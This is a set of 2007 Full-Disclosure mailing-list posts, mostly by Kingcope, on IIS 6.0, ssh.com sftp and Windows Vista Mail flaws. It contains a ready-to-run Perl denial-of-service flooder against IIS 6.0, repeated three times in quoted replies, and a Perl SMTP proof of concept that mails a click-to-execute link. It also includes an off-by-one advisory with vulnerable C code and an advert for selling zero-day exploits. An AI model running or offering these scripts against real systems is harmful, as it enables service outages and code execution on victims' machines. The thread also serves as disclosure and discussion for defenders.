k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?
k>> Here is a lame testing script for this stuff:
k>> #When sending multiple parallel GET
Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
Hello Russian friend,
This is an interesting thought. As you see in the exception
And in the exception backtrace of IIS it tries to access \\.\AUX
Or other special device names. Normally this is blocked by a
C# method which checks the path (for example /AUX.aspx is blocked).
Best Regards,
Kingcope
-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED]
Sent: Wednesday, May 23, 2007 10:41 AM
To: kingcope
Cc: Full-Disclosure; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
Dear kingcope,
It's vulnerability regardless of DoS impact, because it allows attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from device attached to COM1 or prevent another application
>from accessing this port (or LPT), because access to ports is exclusive.
--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
full-disclosure@lists.grok.org.uk:
k> Hello List,
k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond as
k> Normally. So I did write an automated script to see what happens if
k> I request this file several times at once. The result is that some
servers
k> On the internet get quite instable, some do not. On some servers after I
k> Stop the attack I get an exception that the Server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?
k> Here is a lame testing script for this stuff:
k> #When sending multiple parallel GET requests to a IIS 6.0 server
requesting
k> #/AUX/.aspx the server gets instable and non responsive. This happens
only
k> #to servers which respond a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k>
##
k>
###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k>
##
k> use IO::Socket;
k> use threads;
k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];
k> $|=1;
k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k> PeerPort => 'http(80)',
k> Proto=> 'tcp');
k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k> PeerPort => 'http(80)',
k> Proto=> 'tcp');
k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> $k=0;
k> while (<$sock>) {
k> if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k> $k=1;
k> last;
k> }
k> }
k> if ($k==0) {
k> print "Server does not seem vulnerable to this attack.\n";
k> exit;
k> }
k> print "ATTACK!\n";
k> while(1){
k> for (my $i=0;$i<=100;$i++) {
k> $thr = threads->new(\&sendit);
k> print "\r\r\r$i/100";
k> }
k> foreach $thr (threads->list) {
k> $thr->join;
k> }
k> }
k> ___
k> Full-Disclosure - We believe in it.
k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> Hosted and sponsored by Secunia - http://secunia.com/
--
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них
поверили. (Твен)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
Hello Stan,
This is a good question. When I tested this on the latest
Windows Server 2007 with IIS/6.0 locally there was nothing
Like a DoS. On different Windows Servers in the wild the effect was
That the servers did not respond for about 5 minutes after sending
The packets for ~20 seconds in many cases (also 5.0). Running the script for
several minutes gave me an HTTPException on /. Perhaps this may be a
configuration issue?
Best Regards,
kcope
-Original Message-
From: Stan Bubrouski [mailto:[EMAIL PROTECTED]
Sent: Tuesday, May 22, 2007 5:07 PM
To: kingcope
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
What version of the .NET framework is running on the server? 1.1.x,
2.0.x, or 3.0.x?
-sb
On 5/22/07, kingcope <[EMAIL PROTECTED]> wrote:
> Hello List,
>
> Recently I saw a small bug in IIS 6.0 when requesting a special path.
> When I request /AUX/.aspx the server takes a bit longer to respond as
> Normally. So I did write an automated script to see what happens if
> I request this file several times at once. The result is that some servers
> On the internet get quite instable, some do not. On some servers after I
> Stop the attack I get an exception that the Server is too busy/Unhandled
> Exception on the wwwroot (/) path.
> Can you/the list confirm that?
>
> Here is a lame testing script for this stuff:
>
>
>
>
>
> #When sending multiple parallel GET requests to a IIS 6.0 server
requesting
> #/AUX/.aspx the server gets instable and non responsive. This happens only
> #to servers which respond a runtime error (System.Web.HttpException)
> #and take two or more seconds to respond to the /AUX/.aspx GET request.
> #
> #
> #signed,
> #Kingcope [EMAIL PROTECTED]
> ##
> ###***
> ###
> ###
> ###
> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
> ### by Kingcope, May/2007
> ### Better run this from a Linux system
> ##
>
> use IO::Socket;
> use threads;
>
> if ($ARGV[0] eq "") { exit; }
> my $host = $ARGV[0];
>
> $|=1;
>
> sub sendit {
> $sock = IO::Socket::INET->new(PeerAddr => $host,
> PeerPort => 'http(80)',
> Proto=> 'tcp');
>
> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
> $host\r\nConnection:close\r\n\r\n";
> }
>
> $sock = IO::Socket::INET->new(PeerAddr => $host,
> PeerPort => 'http(80)',
> Proto=> 'tcp');
>
> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
> $host\r\nConnection:close\r\n\r\n";
>
> $k=0;
> while (<$sock>) {
> if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
> $k=1;
> last;
> }
> }
>
> if ($k==0) {
> print "Server does not seem vulnerable to this attack.\n";
> exit;
> }
>
> print "ATTACK!\n";
>
> while(1){
>
> for (my $i=0;$i<=100;$i++) {
> $thr = threads->new(\&sendit);
> print "\r\r\r$i/100";
> }
>
> foreach $thr (threads->list) {
> $thr->join;
> }
> }
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???
Hello List,
Recently I saw a small bug in IIS 6.0 when requesting a special path.
When I request /AUX/.aspx the server takes a bit longer to respond as
Normally. So I did write an automated script to see what happens if
I request this file several times at once. The result is that some servers
On the internet get quite instable, some do not. On some servers after I
Stop the attack I get an exception that the Server is too busy/Unhandled
Exception on the wwwroot (/) path.
Can you/the list confirm that?
Here is a lame testing script for this stuff:
#When sending multiple parallel GET requests to a IIS 6.0 server requesting
#/AUX/.aspx the server gets instable and non responsive. This happens only
#to servers which respond a runtime error (System.Web.HttpException)
#and take two or more seconds to respond to the /AUX/.aspx GET request.
#
#
#signed,
#Kingcope [EMAIL PROTECTED]
##
###***
###
###
###
### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
### by Kingcope, May/2007
### Better run this from a Linux system
##
use IO::Socket;
use threads;
if ($ARGV[0] eq "") { exit; }
my $host = $ARGV[0];
$|=1;
sub sendit {
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto=> 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
$host\r\nConnection:close\r\n\r\n";
}
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 'http(80)',
Proto=> 'tcp');
print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
$host\r\nConnection:close\r\n\r\n";
$k=0;
while (<$sock>) {
if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
$k=1;
last;
}
}
if ($k==0) {
print "Server does not seem vulnerable to this attack.\n";
exit;
}
print "ATTACK!\n";
while(1){
for (my $i=0;$i<=100;$i++) {
$thr = threads->new(\&sendit);
print "\r\r\r$i/100";
}
foreach $thr (threads->list) {
$thr->join;
}
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ssh.com ssh-3.2.9.1 sftp server remote off by one
ssh.com ssh-3.2.9.1 sftp server remote off by one
***ATTENTION***This has not been tested under reallife conditions***
ssh-3.2.9.1 which is available from http://ftp.ssh.com/pub/ssh/
contains the same old rootd off by one bug as described bei isec.pl here:
http://www.isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
The file ssh-3.2.9.1/lib/sshfilexfer/sshunixrealpath.c reads
/*
* char *ssh_realpath(const char *path, char resolved_path[MAXPATHLEN]);
*
* Find the real name of path, by removing all ".", ".." and symlink
* components. Returns (resolved) on success, or (NULL) on failure,
* in which case the path which caused trouble is left in (resolved).
*
*/
char *ssh_realpath(const char *path, char *resolved)
{
struct stat sb;
int n, rootd, serrno;
...
...
...
...
...
/*
* Join the two strings together, ensuring that the right thing
* happens if the last component is empty, or the dirname is root.
*/
if (resolved[0] == '/' && resolved[1] == '\0')
rootd = 1;
else
rootd = 0;
if (*wbuf)
{
if (strlen(resolved) + strlen(wbuf) + rootd + 1 > MAXPATHLEN) //
<- !rootd
{
errno = ENAMETOOLONG;
goto err1;
}
if (rootd == 0)
(void)strcat(resolved, "/"); /* XXX: strcat is safe */
(void)strcat(resolved, wbuf); /* XXX: strcat is safe */
}
...
...
...
...
...
ssh_realpath is called when theres an incoming SSH_FXP_REALPATH packet.
from sshfilexfers.c :
---snip---
case SSH_FXP_REALPATH:
LOG(0, SSH_LOG_INFORMATIONAL, ("Received SSH_FXP_REALPATH"));
/* Parse the REALPATH message. */
if (ssh_decode_array(data, len,
SSH_FORMAT_UINT32, &id,
SSH_FORMAT_UINT32_STR, &name, NULL,
SSH_FORMAT_END) != len || len == 0)
{
ssh_warning("ssh_file_server_receive_proc: bad REALPATH");
goto return_bad_status;
}
LOG(0, SSH_LOG_INFORMATIONAL, ("Resolving path to `%s'", name));
if (ssh_realpath(name, resolved) == NULL)
{
---snip---
old pure-ftpd and openssh versions contain the same code but thats
out of scope, just to mention ssh.com's opensource ssh because
it's unpatched and CURRENT.
big
thanxx to thierry alex sead blackzero wY! andi! rembrandt and revoguard
Signed,
Kingcope kingcope[at]gmx.net
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Hello, I just tested it with UNC paths, and yes this works too, but you have to press on the yes button when it asks because the file is not authorized (it comes from remote). After pressing Yes one time it gets executed. Normally Windows Mail does not execute exe or other executable files, now it does :-) Thank you for this nice idea Joxean Koret. Regards, kcope - Original Message - From: "Joxean Koret" <[EMAIL PROTECTED]> To: ; <[EMAIL PROTECTED]> Sent: Friday, March 23, 2007 11:15 AM Subject: RE: [Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability > Hi, > > Did you test it using UNC paths? It may be a way to > truly execute arbitrary code. > > Regards, > Joxean Koret > >>Exploit: >>Send a HTML email message containing the URL: >>Click here! >>or >>Click here! >>and winrm.cmd/migwiz.exe gets executed without asking > >>for permission. >>These are just examples. >> >>I could not pass arguments to winrm (hehe this would >>be beautiful), but I guess there >>are several attack vectors. > > > > __ > LLama Gratis a cualquier PC del Mundo. > Llamadas a fijos y móviles desde 1 céntimo por minuto. > http://es.voice.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Microsoft Windows Vista - Windows Mail Client Side Code Execution Vulnerability
Successfully Tested on Windows Vista Ultimate
Greetings fly out to Alex,wtfomg,Thierry,Andi and Blackzero
Description
Windows Mail is the default Mail Client of Microsoft Windows Vista.
Vulnerability
Remote Code Execution is possible if a user clicks on a malicious prepared link.
Vistas Mail Client will execute any executable file if a folder exists with the
same name.
For example the victim has a folder in C:\ named blah and a batch script named
blah.bat
also in C:\. Now if the victim clicks on a link in the email message with the
URL target
set to C:\blah the batch script is executed without even asking.
There is for example a CMD script by default in C:\Windows\System32\ named
winrm.cmd
(and also a folder named winrm inside System32).
Exploit:
Send a HTML email message containing the URL:
Click here!
or
Click here!
and winrm.cmd/migwiz.exe gets executed without asking for permission.
These are just examples.
I could not pass arguments to winrm (hehe this would be beautiful), but I guess
there
are several attack vectors.
Proof of Concept
---snip---
use Net::SMTP_auth;
$smtp = Net::SMTP_auth->new('smtp.1und1.de', Debug => 1);
$smtp->auth('PLAIN', 'username', 'password');
$smtp->mail("[EMAIL PROTECTED]");
$smtp->to("[EMAIL PROTECTED]");
$msg = "Subject: Vista Remote Code Exec\r\n"
."From: [EMAIL PROTECTED]"
."To: [EMAIL PROTECTED]"
."MIME-Version: 1.0\r\n"
."Content-Type: text/html\r\n\r\nClick
here!";
$smtp->data();
$smtp->datasend("$msg\n");
$smtp->dataend();
$smtp->quit;
---snip---
Signed,
Kingcope / kingcope[at]gmx.net / 2007
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Exploit selling service up and running
Hello List, This is Kingcope. We now have our Exploit selling site up and running. On www.com-winner.com you can purchase quality advisories and exploits. Feel free to contact our sales person for getting the latest Zero-Days. Best Regards, kingcope com-winner.com Research Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
